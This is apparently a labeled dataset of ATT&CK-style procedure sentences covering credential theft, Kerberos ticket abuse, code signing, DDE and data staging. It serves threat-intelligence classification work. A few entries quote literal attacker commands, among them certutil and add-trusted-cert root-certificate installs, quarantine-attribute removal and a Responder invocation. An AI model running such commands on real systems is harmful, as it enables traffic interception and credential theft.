{"text1":"APT29 has used compromised service principals to make changes to the Office 365 environment.","labels":"['T1550.001']"}
{"text1":"CreepyDrive can use legitimate OAuth refresh tokens to authenticate with OneDrive.","labels":"['T1550.001']"}
{"text1":"Peirates can use stolen service account tokens to perform its operations. It also enables adversaries to switch between valid service accounts.","labels":"['T1550.001']"}
{"text1":"APT28 has used pass the hash for lateral movement.","labels":"['T1550.002']"}
{"text1":"APT32 has used pass the hash for lateral movement.","labels":"['T1550.002']"}
{"text1":"Chimera has dumped password hashes for use in pass the hash authentication attacks.","labels":"['T1550.002']"}
{"text1":"Cobalt Strike can perform pass the hash.","labels":"['T1550.002']"}
{"text1":"CrackMapExec can pass the hash to authenticate via SMB.","labels":"['T1550.002']"}
{"text1":"During Night Dragon, threat actors used pass-the-hash tools to obtain authenticated access to sensitive internal desktops and servers.","labels":"['T1550.002']"}
{"text1":"HOPLIGHT has been observed loading several APIs associated with Pass the Hash.","labels":"['T1550.002']"}
{"text1":"Kimsuky has used pass the hash for authentication to remote access software used in C2.","labels":"['T1550.002']"}
{"text1":"Night Dragon used pass-the-hash tools to gain usernames and passwords.","labels":"['T1550.002']"}
{"text1":"Pass-The-Hash Toolkit can perform pass the hash.","labels":"['T1550.002']"}
{"text1":"PoshC2 has a number of modules that leverage pass the hash for lateral movement.","labels":"['T1550.002']"}
{"text1":"The APT1 group is known to have used pass the hash.","labels":"['T1550.002']"}
{"text1":"APT29 used Kerberos ticket attacks for lateral movement.","labels":"['T1550.003']"}
{"text1":"BRONZE BUTLER has created forged Kerberos Ticket Granting Ticket (TGT) and Ticket Granting Service (TGS) tickets to maintain administrative access.","labels":"['T1550.003']"}
{"text1":"Mimikatz\u2019s \"LSADUMP::DCSync\" and \"KERBEROS::PTT\" modules implement the three steps required to extract the krbtgt account hash and create\/use Kerberos tickets.","labels":"['T1550.003']"}
{"text1":"Pupy can also perform pass-the-ticket.","labels":"['T1550.003']"}
{"text1":"Some SeaDuke samples have a module to use pass the ticket with Kerberos for authentication.","labels":"['T1550.003']"}
{"text1":"APT29 used stolen cookies to access cloud resources, and a forged \"duo-sid\" cookie to bypass MFA set on an email account.","labels":"['T1550.004']"}
{"text1":"UNC2452 used a forged \"duo-sid\" cookie to bypass MFA set on an email account.","labels":"['T1550.004']"}
{"text1":"Astaroth uses an external software known as NetPass to recover passwords.","labels":"['T1552', 'T1555']"}
{"text1":"AADInternals can gather unsecured credentials for Azure AD services, such as Azure AD Connect, from a local machine.","labels":"['T1552.001']"}
{"text1":"Agent Tesla has the ability to extract credentials from configuration or support files.","labels":"['T1552.001']"}
{"text1":"Azorult can steal credentials in files belonging to common software such as Skype, Telegram, and Steam.","labels":"['T1552.001']"}
{"text1":"Fox Kitten has accessed files to gain valid credentials.","labels":"['T1552.001']"}
{"text1":"Hildegard has searched for SSH keys, Docker credentials, and Kubernetes service tokens.","labels":"['T1552.001']"}
{"text1":"LaZagne can obtain credentials from chats, databases, mail, and WiFi.","labels":"['T1552.001']"}
{"text1":"QuasarRAT can obtain passwords from FTP clients.","labels":"['T1552.001']"}
{"text1":"Smoke Loader searches for files named logins.json to parse for credentials.","labels":"['T1552.001']"}
{"text1":"Stolen Pencil has used tools that are capable of obtaining credentials from saved mail.","labels":"['T1552.001']"}
{"text1":"TeamTNT has searched for unsecured AWS credentials and Docker API credentials.","labels":"['T1552.001']"}
{"text1":"TrickBot can obtain passwords stored in files from several applications such as Outlook, Filezilla, OpenSSH, OpenVPN and WinSCP. Additionally, it searches for the \".vnc.lnk\" affix to steal VNC credentials.","labels":"['T1552.001']"}
{"text1":"XTunnel is capable of accessing locally stored passwords on victims.","labels":"['T1552.001']"}
{"text1":"jRAT can capture passwords from common chat applications such as MSN Messenger, AOL, Instant Messenger, and and Google Talk.","labels":"['T1552.001']"}
{"text1":"APT32 used Outlook Credential Dumper to harvest credentials stored in Windows registry.","labels":"['T1552.002']"}
{"text1":"IceApple can harvest credentials from local and remote host registries.","labels":"['T1552.002']"}
{"text1":"PowerSploit has several modules that search the Windows Registry for stored credentials: \"Get-UnattendedInstallFile\", \"Get-Webconfig\", \"Get-ApplicationHost\", \"Get-SiteListPassword\", \"Get-CachedGPPPassword\", and \"Get-RegistryAutoLogon\".","labels":"['T1552.002']"}
{"text1":"Reg may be used to find credentials in the Windows Registry.","labels":"['T1552.002']"}
{"text1":"TrickBot has retrieved PuTTY credentials by querying the \"Software\\SimonTatham\\Putty\\Sessions\" registry key","labels":"['T1552.002']"}
{"text1":"Valak can use the clientgrabber module to steal e-mail credentials from the Registry.","labels":"['T1552.002']"}
{"text1":"Kinsing has searched \"bash_history\" for credentials.","labels":"['T1552.003']"}
{"text1":"APT29 obtained PKI keys, certificate files and the private encryption key from an Active Directory Federation Services (AD FS) container to decrypt corresponding SAML signing certificates.","labels":"['T1552.004']"}
{"text1":"During Operation Wocao, threat actors used Mimikatz to dump certificates and private keys from the Windows certificate store.","labels":"['T1552.004']"}
{"text1":"Ebury has intercepted unencrypted private keys as well as private key pass-phrases.","labels":"['T1552.004']"}
{"text1":"Empire can use modules like \"Invoke-SessionGopher\" to extract private key and session information.","labels":"['T1552.004']"}
{"text1":"Hildegard has searched for private keys in .ssh.","labels":"['T1552.004']"}
{"text1":"Kinsing has searched for private keys.","labels":"['T1552.004']"}
{"text1":"Machete has scanned and looked for cryptographic keys and certificate file extensions.","labels":"['T1552.004']"}
{"text1":"Mimikatz's \"CRYPTO::Extract\" module can extract keys by interacting with Windows cryptographic application programming interface (API) functions.","labels":"['T1552.004']"}
{"text1":"Rocke has used SSH private keys on the infected machine to spread its coinminer throughout a network.","labels":"['T1552.004']"}
{"text1":"TeamTNT has searched for unsecured SSH keys.","labels":"['T1552.004']"}
{"text1":"Hildegard has queried the Cloud Instance Metadata API for cloud credentials.","labels":"['T1552.005']"}
{"text1":"Peirates can query the query AWS and GCP metadata APIs for secrets.","labels":"['T1552.005']"}
{"text1":"TeamTNT has queried the AWS instance metadata service for credentials.","labels":"['T1552.005']"}
{"text1":"APT33 has used a variety of publicly available tools like Gpppassword to gather credentials.","labels":"['T1552.006']"}
{"text1":"PowerSploit contains a collection of Exfiltration modules that can harvest credentials from Group Policy Preferences.","labels":"['T1552.006']"}
{"text1":"Peirates can query the Kubernetes API for secrets.","labels":"['T1552.007']"}
{"text1":"Axiom has used digital certificates to deliver malware.","labels":"['T1553']"}
{"text1":"OSX_OCEANLOTUS.D uses the command \"xattr -d com.apple.quarantine\" to remove the quarantine file attribute used by Gatekeeper.","labels":"['T1553.001']"}
{"text1":"XCSSET has dropped a malicious applet into an app's `...\/Contents\/MacOS\/` folder of a previously launched app to bypass Gatekeeper's security checks on first launch apps (prior to macOS 13).","labels":"['T1553.001']"}
{"text1":"A QuasarRAT .dll file is digitally signed by a certificate from AirVPN.","labels":"['T1553.002']"}
{"text1":"APT29 was able to get SUNBURST signed by SolarWinds code signing certificates by injecting the malware into the SolarWinds Orion software lifecycle.","labels":"['T1553.002']"}
{"text1":"APT41 leveraged code-signing certificates to sign malware when targeting both gaming and non-gaming organizations.","labels":"['T1553.002']"}
{"text1":"Anchor has been signed with valid certificates to evade detection by security tools.","labels":"['T1553.002']"}
{"text1":"BLINDINGCAN has been signed with code-signing certificates such as CodeRipper.","labels":"['T1553.002']"}
{"text1":"Bandook was signed with valid Certum certificates.","labels":"['T1553.002']"}
{"text1":"Bazar has been signed with fake certificates including those appearing to be from VB CORPORATE PTY. LTD.","labels":"['T1553.002']"}
{"text1":"CSPY Downloader has come signed with revoked certificates.","labels":"['T1553.002']"}
{"text1":"ChChes samples were digitally signed with a certificate originally used by Hacking Team that was later leaked and subsequently revoked.","labels":"['T1553.002']"}
{"text1":"Clop can use code signing to evade detection.","labels":"['T1553.002']"}
{"text1":"Cobalt Strike can use self signed Java applets to execute signed applet attacks.","labels":"['T1553.002']"}
{"text1":"CopyKittens digitally signed an executable with a stolen certificate from legitimate company AI Squared.","labels":"['T1553.002']"}
{"text1":"Darkhotel has used code-signing certificates on its malware that are either forged due to weak keys or stolen. Darkhotel has also stolen certificates and signed backdoors and downloaders with them.","labels":"['T1553.002']"}
{"text1":"During Operation Honeybee, the threat actors deployed the MaoCheng dropper with a stolen Adobe Systems digital signature.","labels":"['T1553.002']"}
{"text1":"Ebury has installed a self-signed RPM package mimicking the original system package on RPM based systems.","labels":"['T1553.002']"}
{"text1":"Ecipekac has used a valid, legitimate digital signature to evade detection.","labels":"['T1553.002']"}
{"text1":"Ember Bear has used stolen certificates from Electrum Technologies GmbH to sign payloads.","labels":"['T1553.002']"}
{"text1":"FIN6 has used Comodo code-signing certificates.","labels":"['T1553.002']"}
{"text1":"FIN7 has signed Carbanak payloads with legally purchased code signing certificates. FIN7 has also digitally signed their phishing documents, backdoors and other staging tools to bypass security controls.","labels":"['T1553.002']"}
{"text1":"Gazer versions are signed with various valid certificates; one was likely faked and issued by Comodo for \"Solid Loop Ltd,\" and another was issued for \"Ultimate Computer Support Ltd.\"","labels":"['T1553.002']"}
{"text1":"HermeticWizard has been signed by valid certificates assigned to Hermetica Digital.","labels":"['T1553.002']"}
{"text1":"Honeybee uses a dropper called MaoCheng that harvests a stolen digital signature from Adobe Systems.","labels":"['T1553.002']"}
{"text1":"Kimsuky has signed files with the name EGIS CO,. Ltd..","labels":"['T1553.002']"}
{"text1":"Lazarus Group has digitally signed malware and utilities to evade detection.","labels":"['T1553.002']"}
{"text1":"Leviathan has used stolen code signing certificates to sign malware.","labels":"['T1553.002']"}
{"text1":"Molerats has used forged Microsoft code-signing certificates on malware.","labels":"['T1553.002']"}
{"text1":"More_eggs has used a signed binary shellcode loader and a signed Dynamic Link Library (DLL) to create a reverse shell.","labels":"['T1553.002']"}
{"text1":"Nerex drops a signed Microsoft DLL to disk.","labels":"['T1553.002']"}
{"text1":"PROMETHIUM has signed code with self-signed certificates.","labels":"['T1553.002']"}
{"text1":"Patchwork has signed malware with self-signed certificates from fictitious and spoofed legitimate software companies.","labels":"['T1553.002']"}
{"text1":"QakBot can use signed loaders to evade detection.","labels":"['T1553.002']"}
{"text1":"RTM samples have been signed with a code-signing certificates.","labels":"['T1553.002']"}
{"text1":"SDelete is digitally signed by Microsoft.","labels":"['T1553.002']"}
{"text1":"SUNBURST was digitally signed by SolarWinds from March - May 2020.","labels":"['T1553.002']"}
{"text1":"Silence has used a valid certificate to sign their primary loader Silence.Downloader (aka TrueBot).","labels":"['T1553.002']"}
{"text1":"Some Daserf samples were signed with a stolen digital certificate.","labels":"['T1553.002']"}
{"text1":"SpicyOmelette has been signed with valid digital certificates.","labels":"['T1553.002']"}
{"text1":"StrongPity has been signed with self-signed certificates.","labels":"['T1553.002']"}
{"text1":"TrickBot has come with a signed downloader component.","labels":"['T1553.002']"}
{"text1":"Turla has used valid digital certificates from Sysprint AG to sign its Epic dropper.","labels":"['T1553.002']"}
{"text1":"UNC2452 was able to get SUNBURST signed by SolarWinds code signing certificates by injecting the malware into the SolarWinds Orion software lifecycle.","labels":"['T1553.002']"}
{"text1":"Winnti Group used stolen certificates to sign its malware.","labels":"['T1553.002']"}
{"text1":"Wizard Spider has used Digicert code-signing certificates for some of its malware.","labels":"['T1553.002']"}
{"text1":"Dok installs a root certificate to aid in Adversary-in-the-Middle actions using the command \"add-trusted-cert -d -r trustRoot -k \/Library\/Keychains\/System.keychain \/tmp\/filename\".","labels":"['T1553.004']"}
{"text1":"RTM can add a certificate to the Windows store.","labels":"['T1553.004']"}
{"text1":"certutil can be used to install browser root certificates as a precursor to performing Adversary-in-the-Middle between connections to banking websites. Example command: \"certutil -addstore -f -user ROOT ProgramData\\cert512121.der\".","labels":"['T1553.004']"}
{"text1":"APT29 has embedded ISO images and VHDX files in HTML to evade Mark-of-the-Web.","labels":"['T1553.005']"}
{"text1":"Amadey has modified the `:Zone.Identifier` in the ADS area to zero.","labels":"['T1553.005']"}
{"text1":"TA505 has used .iso files to deploy malicious .lnk files.","labels":"['T1553.005']"}
{"text1":"APT39 has used malware to turn off the \"RequireSigned\" feature which ensures only signed DLLs can be run on Windows.","labels":"['T1553.006']"}
{"text1":"BlackEnergy has enabled the \"TESTSIGNING\" boot configuration option to facilitate loading of a driver component.","labels":"['T1553.006']"}
{"text1":"Hikit has attempted to disable driver signing verification by tampering with several Registry keys prior to the loading of a rootkit driver component.","labels":"['T1553.006']"}
{"text1":"Bonadan has maliciously altered the OpenSSH binary on targeted systems to create a backdoor.","labels":"['T1554']"}
{"text1":"Industroyer has used a Trojanized version of the Windows Notepad application for an additional backdoor persistence mechanism.","labels":"['T1554']"}
{"text1":"Kobalos replaced the SSH client with a trojanized SSH client to steal credentials on compromised systems.","labels":"['T1554']"}
{"text1":"ThiefQuest searches through the \"\/Users\/\" folder looking for executable files. For each executable, ThiefQuest prepends a copy of itself to the beginning of the file. When the file is executed, the ThiefQuest code is executed first. ThiefQuest creates a hidden file, copies the original target executable to the file, then executes the new hidden file to maintain the appearance of normal behavior.","labels":"['T1554']"}
{"text1":"XCSSET uses a malicious browser application to replace the legitimate browser in order to continuously capture credentials, monitor web traffic, and download additional modules.","labels":"['T1554']"}
{"text1":"A module in Prikormka collects passwords stored in applications installed on the victim.","labels":"['T1555']"}
{"text1":"APT39 has used the Smartftp Password Decryptor tool to decrypt FTP passwords.","labels":"['T1555']"}
{"text1":"Agent Tesla has the ability to steal credentials from FTP clients and wireless profiles.","labels":"['T1555']"}
{"text1":"CosmicDuke collects user credentials, including passwords, for various programs including popular instant messaging applications and email clients as well as WLAN keys.","labels":"['T1555']"}
{"text1":"FIN6 has used the Stealer One credential stealer to target e-mail and file transfer utilities including FTP.","labels":"['T1555']"}
{"text1":"KGH_SPY can collect credentials from WINSCP.","labels":"['T1555']"}
{"text1":"Matryoshka is capable of stealing Outlook passwords.","labels":"['T1555']"}
{"text1":"Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the credential vault and DPAPI.","labels":"['T1555']"}
{"text1":"NETWIRE can retrieve passwords from messaging and mail client applications.","labels":"['T1555']"}
{"text1":"OLDBAIT collects credentials from several email clients.","labels":"['T1555']"}
{"text1":"PLEAD has the ability to steal saved passwords from Microsoft Outlook.","labels":"['T1555']"}
{"text1":"PoshC2 can decrypt passwords stored in the RDCMan configuration file.","labels":"['T1555']"}
{"text1":"Stealth Falcon malware gathers passwords from multiple sources, including Windows Credential Vault and Outlook.","labels":"['T1555']"}
{"text1":"UNC2452 used account credentials they obtained to attempt access to Group Managed Service Account (gMSA) passwords.","labels":"['T1555']"}
{"text1":"Calisto collects Keychain storage data and copies those passwords\/tokens to a file.","labels":"['T1555.001']"}
{"text1":"LaZagne can obtain credentials from macOS Keychains.","labels":"['T1555.001']"}
{"text1":"MacMa can dump credentials from the macOS keychain.","labels":"['T1555.001']"}
{"text1":"Proton gathers credentials in files for keychains.","labels":"['T1555.001']"}
{"text1":"Keydnap uses the keychaindump project to read securityd memory.","labels":"['T1555.002']"}
{"text1":"A module in Prikormka gathers logins and passwords stored in applications on the victims, including Google Chrome, Mozilla Firefox, and several other browsers.","labels":"['T1555.003']"}
{"text1":"APT29 has stolen user's saved passwords from Chrome.","labels":"['T1555.003']"}
{"text1":"APT37 has used a credential stealer known as ZUMKONG that can harvest usernames and passwords stored in browsers.","labels":"['T1555.003']"}
{"text1":"Agent Tesla can gather credentials from a number of browsers.","labels":"['T1555.003']"}
{"text1":"Ajax Security Team has used FireMalv custom-developed malware, which collected passwords from the Firefox browser storage.","labels":"['T1555.003']"}
{"text1":"Azorult can steal credentials from the victim's browser.","labels":"['T1555.003']"}
{"text1":"BLUELIGHT can collect passwords stored in web browers, including Internet Explorer, Edge, Chrome, and Naver Whale.","labels":"['T1555.003']"}
{"text1":"BlackEnergy has used a plug-in to gather credentials from web browsers including FireFox, Google Chrome, and Internet Explorer.","labels":"['T1555.003']"}
{"text1":"Carberp's passw.plug plugin can gather passwords saved in Opera, Internet Explorer, Safari, Firefox, and Chrome.","labels":"['T1555.003']"}
{"text1":"ChChes steals credentials stored inside Internet Explorer.","labels":"['T1555.003']"}
{"text1":"Chaes can steal login credentials and stored financial information from the browser.","labels":"['T1555.003']"}
{"text1":"CookieMiner can steal saved usernames and passwords in Chrome as well as credit card credentials.","labels":"['T1555.003']"}
{"text1":"Crimson contains a module to steal credentials from Web browsers on the victim machine.","labels":"['T1555.003']"}
{"text1":"Empire can use modules that extract passwords from common web browsers such as Firefox and Chrome.","labels":"['T1555.003']"}
{"text1":"FIN6 has used the Stealer One credential stealer to target web browsers.","labels":"['T1555.003']"}
{"text1":"Inception used a browser plugin to steal passwords and sessions from Internet Explorer, Chrome, Opera, Firefox, Torch, and Yandex.","labels":"['T1555.003']"}
{"text1":"Javali can capture login credentials from open browsers including Firefox, Chrome, Internet Explorer, and Edge.","labels":"['T1555.003']"}
{"text1":"KGH_SPY has the ability to steal data from the Chrome, Edge, Firefox, Thunderbird, and Opera browsers.","labels":"['T1555.003']"}
{"text1":"KeyBoy attempts to collect passwords from browsers.","labels":"['T1555.003']"}
{"text1":"Kimsuky has used browser extensions including Google Chrome to steal passwords and cookies from browsers. Kimsuky has also used Nirsoft's WebBrowserPassView tool to dump the passwords obtained from victims.","labels":"['T1555.003']"}
{"text1":"LAPSUS$ has obtained passwords and session tokens with the use of the Redline password stealer.","labels":"['T1555.003']"}
{"text1":"LaZagne can obtain credentials from web browsers such as Google Chrome, Internet Explorer, and Firefox.","labels":"['T1555.003']"}
{"text1":"Lizar has a module to collect usernames and passwords stored in browsers.","labels":"['T1555.003']"}
{"text1":"Lokibot has demonstrated the ability to steal credentials from multiple applications and data sources including Safari and the Chromium and Mozilla Firefox-based web browsers.","labels":"['T1555.003']"}
{"text1":"Machete collects stored credentials from several web browsers.","labels":"['T1555.003']"}
{"text1":"Magic Hound used FireMalv, custom-developed malware, which collected passwords from the Firefox browser storage.","labels":"['T1555.003']"}
{"text1":"Melcoz has the ability to steal credentials from web browsers.","labels":"['T1555.003']"}
{"text1":"Molerats used the public tool BrowserPasswordDump10 to dump passwords saved in browsers on victims.","labels":"['T1555.003']"}
{"text1":"NETWIRE has the ability to steal credentials from web browsers including Internet Explorer, Opera, Yandex, and Chrome.","labels":"['T1555.003']"}
{"text1":"OLDBAIT collects credentials from Internet Explorer, Mozilla Firefox, and Eudora.","labels":"['T1555.003']"}
{"text1":"PLEAD can harvest saved credentials from browsers such as Google Chrome, Microsoft Internet Explorer, and Mozilla Firefox.","labels":"['T1555.003']"}
{"text1":"Patchwork dumped the login data database from \"\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\".","labels":"['T1555.003']"}
{"text1":"PinchDuke steals credentials from compromised hosts. PinchDuke's credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware (also known as LdPinch). Credentials targeted by PinchDuke include ones associated with many sources such as Netscape Navigator, Mozilla Firefox, Mozilla Thunderbird, and Internet Explorer.","labels":"['T1555.003']"}
{"text1":"Proton gathers credentials for Google Chrome.","labels":"['T1555.003']"}
{"text1":"QakBot has collected usernames and passwords from Firefox and Chrome.","labels":"['T1555.003']"}
{"text1":"QuasarRAT can obtain passwords from common web browsers.","labels":"['T1555.003']"}
{"text1":"ROKRAT can steal credentials stored in Web browsers by querying the sqlite database.","labels":"['T1555.003']"}
{"text1":"RainyDay can use tools to collect credentials from web browsers.","labels":"['T1555.003']"}
{"text1":"RedLeaves can gather browser usernames and passwords.","labels":"['T1555.003']"}
{"text1":"Sandworm Team's CredRaptor tool can collect saved passwords from various internet browsers.","labels":"['T1555.003']"}
{"text1":"Smoke Loader searches for credentials stored from web browsers.","labels":"['T1555.003']"}
{"text1":"Some Backdoor.Oldrea samples contain a publicly available Web browser password recovery tool.","labels":"['T1555.003']"}
{"text1":"Stealth Falcon malware gathers passwords from multiple sources, including Internet Explorer, Firefox, and Chrome.","labels":"['T1555.003']"}
{"text1":"TSCookie has the ability to steal saved passwords from the Internet Explorer, Edge, Firefox, and Chrome browsers.","labels":"['T1555.003']"}
{"text1":"TrickBot can obtain passwords stored in files from web browsers such as Chrome, Firefox, Internet Explorer, and Microsoft Edge, sometimes using esentutl.","labels":"['T1555.003']"}
{"text1":"Trojan.Karagany can steal data and credentials from browsers.","labels":"['T1555.003']"}
{"text1":"WarzoneRAT has the capability to grab passwords from numerous web browsers as well as from Outlook and Thunderbird email clients.","labels":"['T1555.003']"}
{"text1":"XAgentOSX contains the getFirefoxPassword function to attempt to locate Firefox passwords.","labels":"['T1555.003']"}
{"text1":"jRAT can capture passwords from common web browsers such as Internet Explorer, Google Chrome, and Firefox.","labels":"['T1555.003']"}
{"text1":"njRAT has a module that steals passwords saved in victim web browsers.","labels":"['T1555.003']"}
{"text1":"OilRig has used credential dumping tool named VALUEVAULT to steal credentials from the Windows Credential Manager.","labels":"['T1555.004']"}
{"text1":"ROKRAT can steal credentials by leveraging the Windows Vault mechanism.","labels":"['T1555.004']"}
{"text1":"RainyDay can use the QuarksPwDump tool to obtain local passwords and domain cached credentials.","labels":"['T1555.004']"}
{"text1":"Turla has gathered credentials from the Windows Credential Manager tool.","labels":"['T1555.004']"}
{"text1":"Valak can use a .NET compiled module named exchgrabber to enumerate credentials from the Credential Manager.","labels":"['T1555.004']"}
{"text1":"During Operation Wocao, threat actors accessed and collected credentials from password managers.","labels":"['T1555.005']"}
{"text1":"MarkiRAT can gather information from the Keepass password manager.","labels":"['T1555.005']"}
{"text1":"Operation Wocao has accessed and collected credentials from password managers.","labels":"['T1555.005']"}
{"text1":"Proton gathers credentials in files for 1password.","labels":"['T1555.005']"}
{"text1":"Threat Group-3390 obtained a KeePass database from a compromised host.","labels":"['T1555.005']"}
{"text1":"TrickBot can steal passwords from the KeePass open source password manager.","labels":"['T1555.005']"}
{"text1":"Kessel has trojanized the <sode>ssh_login\" and \"user-auth_pubkey\" functions to steal plaintext credentials.","labels":"['T1556']"}
{"text1":"SILENTTRINITY can create a backdoor in KeePass using a malicious config file and in TortoiseSVN using a registry hook.","labels":"['T1556']"}
{"text1":"Chimera's malware has altered the NTLM authentication program on domain controllers to allow Chimera to login without a valid credential.","labels":"['T1556.001']"}
{"text1":"Remsec harvests plain-text credentials as a password filter registered on domain controllers.","labels":"['T1556.002']"}
{"text1":"Strider has registered its persistence module on domain controllers as a Windows LSA (Local System Authority) password filter to acquire credentials any time a domain, local user, or administrator logs in or changes a password.","labels":"['T1556.002']"}
{"text1":"Ebury can deactivate PAM modules to tamper with the sshd configuration.","labels":"['T1556.003']"}
{"text1":"Skidmap has the ability to replace the pam_unix.so file on an infected machine with its own malicious version that accepts a specific backdoor password for all users.","labels":"['T1556.003']"}
{"text1":"SYNful Knock has the capability to add its own custom backdoor password when it modifies the operating system of the affected network device.","labels":"['T1556.004']"}
{"text1":"APT29 has edited the `Microsoft.IdentityServer.Servicehost.exe.config` file to load a malicious DLL into the AD FS process, thereby enabling persistent access to any service federated with AD FS for a user with a specified User Principal Name.","labels":"['T1556.007']"}
{"text1":"Dok proxies web traffic to potentially monitor and alter victim HTTP(S) traffic.","labels":"['T1557']"}
{"text1":"Impacket modules like ntlmrelayx and smbrelayx can be used in conjunction with Network Sniffing and LLMNR\/NBT-NS Poisoning and SMB Relay to gather NetNTLM credentials for Brute Force or relay attacks that can gain code execution.","labels":"['T1557.001']"}
{"text1":"Lazarus Group executed Responder using the command \"[Responder file path] -i [IP address] -rPv\" on a compromised host to harvest credentials and move laterally.","labels":"['T1557.001']"}
{"text1":"Pupy can sniff plaintext network credentials and use NBNS Spoofing to poison name services.","labels":"['T1557.001']"}
{"text1":"Wizard Spider has used the Invoke-Inveigh PowerShell cmdlets, likely for name service poisoning.","labels":"['T1557.001']"}
{"text1":"Empire can leverage its implementation of Mimikatz to obtain and use golden tickets.","labels":"['T1558.001']"}
{"text1":"Ke3chang has used Mimikatz to generate Kerberos golden tickets.","labels":"['T1558.001']"}
{"text1":"Mimikatz's kerberos module can create golden tickets.","labels":"['T1558.001']"}
{"text1":"AADInternals can be used to forge Kerberos tickets using the password hash of the AZUREADSSOACC account.","labels":"['T1558.002']"}
{"text1":"Empire can leverage its implementation of Mimikatz to obtain and use silver tickets.","labels":"['T1558.002']"}
{"text1":"APT29 obtained Ticket Granting Service (TGS) tickets for Active Directory Service Principle Names to crack offline.","labels":"['T1558.003']"}
{"text1":"FIN7 has used Kerberoasting for credential access and to enable lateral movement.","labels":"['T1558.003']"}
{"text1":"Operation Wocao has used PowerSploit's Invoke-Kerberoast module to request encrypted service tickets and bruteforce the passwords of Windows service accounts offline.","labels":"['T1558.003']"}
{"text1":"PowerSploit's \"Invoke-Kerberoast\" module can request service tickets and return crackable ticket hashes.","labels":"['T1558.003']"}
{"text1":"UNC2452 obtained Ticket Granting Service (TGS) tickets for Active Directory Service Principle Names to crack offline.","labels":"['T1558.003']"}
{"text1":"Cyclops Blink has the ability to create a pipe to enable inter-process communication.","labels":"['T1559']"}
{"text1":"HyperStack can connect to the IPC$ share on remote machines.","labels":"['T1559']"}
{"text1":"FunnyDream can use com objects identified with `CLSID_ShellLink`(`IShellLink` and `IPersistFile`) and `WScript.Shell`(`RegWrite` method) to enable persistence mechanisms.","labels":"['T1559.001']"}
{"text1":"Gamaredon Group malware can insert malicious macros into documents using a \"Microsoft.Office.Interop\" object.","labels":"['T1559.001']"}
{"text1":"Gelsemium can use the `IARPUinstallerStringLauncher` COM interface are part of its UAC bypass process.","labels":"['T1559.001']"}
{"text1":"InvisiMole can use the \"ITaskService\", \"ITaskDefinition\" and \"ITaskSettings\" COM interfaces to schedule a task.","labels":"['T1559.001']"}
{"text1":"MuddyWater has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook.","labels":"['T1559.001']"}
{"text1":"Neoichor can use the Internet Explorer (IE) COM interface to connect and receive commands from C2.","labels":"['T1559.001']"}
{"text1":"Ramsay can use the Windows COM API to schedule tasks and maintain persistence.","labels":"['T1559.001']"}
{"text1":"APT28 has delivered JHUHUGIT and Koadic by executing PowerShell commands through DDE in Word documents.","labels":"['T1559.002']"}
{"text1":"APT37 has used Windows DDE for execution of commands and a malicious VBS.","labels":"['T1559.002']"}
{"text1":"BITTER has executed OLE objects using Microsoft Equation Editor to download and run malicious payloads.","labels":"['T1559.002']"}
{"text1":"Cobalt Group has sent malicious Word OLE compound documents to victims.","labels":"['T1559.002']"}
{"text1":"FIN7 spear phishing campaigns have included malicious Word documents with DDE execution.","labels":"['T1559.002']"}
{"text1":"Gallmaker attempted to exploit Microsoft\u2019s DDE protocol in order to gain access to victim machines and for execution.","labels":"['T1559.002']"}
{"text1":"HAWKBALL has used an OLE object that uses Equation Editor to drop the embedded shellcode.","labels":"['T1559.002']"}
{"text1":"KeyBoy uses the Dynamic Data Exchange (DDE) protocol to download remote payloads.","labels":"['T1559.002']"}
{"text1":"POWERSTATS can use DDE to execute additional payloads on compromised hosts.","labels":"['T1559.002']"}
{"text1":"Patchwork leveraged the DDE protocol to deliver their malware.","labels":"['T1559.002']"}
{"text1":"PoetRAT was delivered with documents using DDE to execute malicious code.","labels":"['T1559.002']"}
{"text1":"RTM can search for specific strings within browser tabs using a Dynamic Data Exchange mechanism.","labels":"['T1559.002']"}
{"text1":"TA505 has leveraged malicious Word documents that abused DDE.","labels":"['T1559.002']"}
{"text1":"Valak can execute tasks via OLE.","labels":"['T1559.002']"}
{"text1":"ADVSTORESHELL encrypts with the 3DES algorithm and a hardcoded key prior to exfiltration.","labels":"['T1560']"}
{"text1":"APT32's backdoor has used LZMA compression and RC4 encryption before exfiltration.","labels":"['T1560']"}
{"text1":"AppleSeed has compressed collected data before exfiltration.","labels":"['T1560']"}
{"text1":"Aria-body has used ZIP to compress data gathered on a compromised host.","labels":"['T1560']"}
{"text1":"BLUELIGHT can zip files before exfiltration.","labels":"['T1560']"}
{"text1":"Backdoor.Oldrea writes collected data to a temporary file in an encrypted form before exfiltration to a C2 server.","labels":"['T1560']"}
{"text1":"BloodHound can compress data collected by its SharpHound ingestor into a ZIP file to be written to disk.","labels":"['T1560']"}
{"text1":"Bumblebee can compress data stolen from the Registry and volume shadow copies prior to exfiltration.","labels":"['T1560']"}
{"text1":"Cadelspy has the ability to compress stolen data into a .cab file.","labels":"['T1560']"}
{"text1":"Chrommme can encrypt and store on disk collected data before exfiltration.","labels":"['T1560']"}
{"text1":"Daserf hides collected data in password-protected .rar archives.","labels":"['T1560', 'T1560.001']"}
{"text1":"Dragonfly 2.0 compressed data into .zip files prior to exfiltrating it.","labels":"['T1560']"}
{"text1":"Dragonfly has compressed data into .zip files prior to exfiltration.","labels":"['T1560']"}
{"text1":"Emotet has been observed encrypting the data it collects before sending it to the C2 server.","labels":"['T1560']"}
{"text1":"Empire can ZIP directories on the target system.","labels":"['T1560']"}
{"text1":"Epic encrypts collected data using a public key framework before sending it over the C2 channel. Some variants encrypt the collected data with AES and encode it with base64 before transmitting it to the C2 server.","labels":"['T1560']"}
{"text1":"FELIXROOT encrypts collected data with AES and Base64 and then sends it to the C2 server.","labels":"['T1560']"}
{"text1":"Following data collection, FIN6 has compressed log files into a ZIP archive prior to staging and exfiltration.","labels":"['T1560']"}
{"text1":"Gold Dragon encrypts data using Base64 before being sent to the command and control server.","labels":"['T1560']"}
{"text1":"KONNI has encrypted data and files prior to exfiltration.","labels":"['T1560']"}
{"text1":"Kessel can RC4-encrypt credentials before sending to the C2.","labels":"['T1560']"}
{"text1":"Lazarus Group has compressed exfiltrated data with RAR and used RomeoDelta malware to archive specified directories in .zip format, encrypt the .zip file, and upload it to C2.","labels":"['T1560']"}
{"text1":"LightNeuron contains a function to encrypt and store emails that it collects.","labels":"['T1560']"}
{"text1":"Lizar has encrypted data before sending it to the server.","labels":"['T1560']"}
